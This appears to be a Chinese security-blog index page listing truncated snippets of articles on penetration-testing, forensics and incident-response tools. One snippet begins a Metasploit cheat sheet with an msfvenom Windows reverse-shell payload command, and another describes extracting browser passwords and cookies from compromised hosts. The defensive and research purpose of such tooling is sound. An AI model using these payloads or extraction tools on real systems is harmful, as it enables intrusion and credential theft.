前言 在1.0的基础上针对ThinkPHP框架增加了Controller目录一键导入功能,优化了使用体验文章目录 🔗项目地址✨新增功能🐛问题修复📝使用说明📺演示视频最后 🔗 项目地址 https://...
MSF命令大全详解
1|00x00 Payload生成1|1Windows·LinuxWindows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] l...
【工具推荐】自动小程序反编译并匹配敏感信息
免责声明 本文旨在提供有关特定漏洞工具或安全风险的详细信息,以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁,协助提高网络安全意识并推动技术进步,而非出于任何恶意目的。利用本文提...
工具 | ReportGenX
注:仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。0x00 简介ReportGenX是一款二开的渗透测试报告生成工具。0x01 功能...
代理池服务器工具 - ProxyCat
01 项目地址https://github.com/honmashironeko/ProxyCat02 项目介绍项目描述在渗透过程中,经常需要隐藏或更换IP地址以绕过安全设备。然而,市面上的隧道代理价...
AI渗透测试工具 Kali MCP
0x01 工具介绍Kali MCP是一个AI渗透工具,旨在简化渗透测试过程。用户可以通过自然语言操作 AI 执行各种安全测试。 0x02 安装与使用AI执行系统命令 执行命令 id 本工具禁止执行危险...
漏洞挖掘小工具 - SeeMore
0x01 工具介绍 在某系统中发现导入文件功能存在注入攻击提交修复后,程序员只是将导入的元素添加"display: none;"隐藏起来了, 但是这个功能还是存在,所以可以通过将"display: n...
基于Memprocfs和Volatility的可视化内存取证工具 - LovelyMem
01 项目地址https://github.com/Tokeii0/LovelyMem02 项目介绍项目描述一款基于 MemProcFS、Volatility2、Volatility3 的快捷内存取证...
浏览器密码提取工具
前言 有时攻击者在获取一台主机的权限以后,会提取浏览器中的密码,下面介绍一个提取浏览器密码,cookie信息的工具。 hackbrowserData HackBrowserData是一个命令行工具,用...
Windows图形化应急分析工具
想起之前的hvv演练,安全组最近天天在机房盯着主机日志。那段时间处理一个异常外联事件,突然想起上个月在GitHub挖到的这个小工具,今天给大家唠唠它在实战中的那些隐藏用法。咱们先说说日常遇到的糟心事:...
AgentCPM-GUI:MobileUse智能体基于图像推理,操控手机
项目概述AgentCPM-GUI[1]是一款由清华大学THUNLP实验室与面壁智能联合开发的开源端侧智能体大模型,基于MiniCPM-V构建,总参数量为8B。该模型能够接收手机屏幕图像作为输入,并根据...
应急响应工具 QDoctor
0x01 工具介绍 QDoctor(下文中简称QD)是一款非传统意义上的ARK(Anti RootKit)工具。QD既覆盖了传统ARK工具的功能,同时又兼顾了应急响应过程中的常见需求。使用此工具可以极...
2070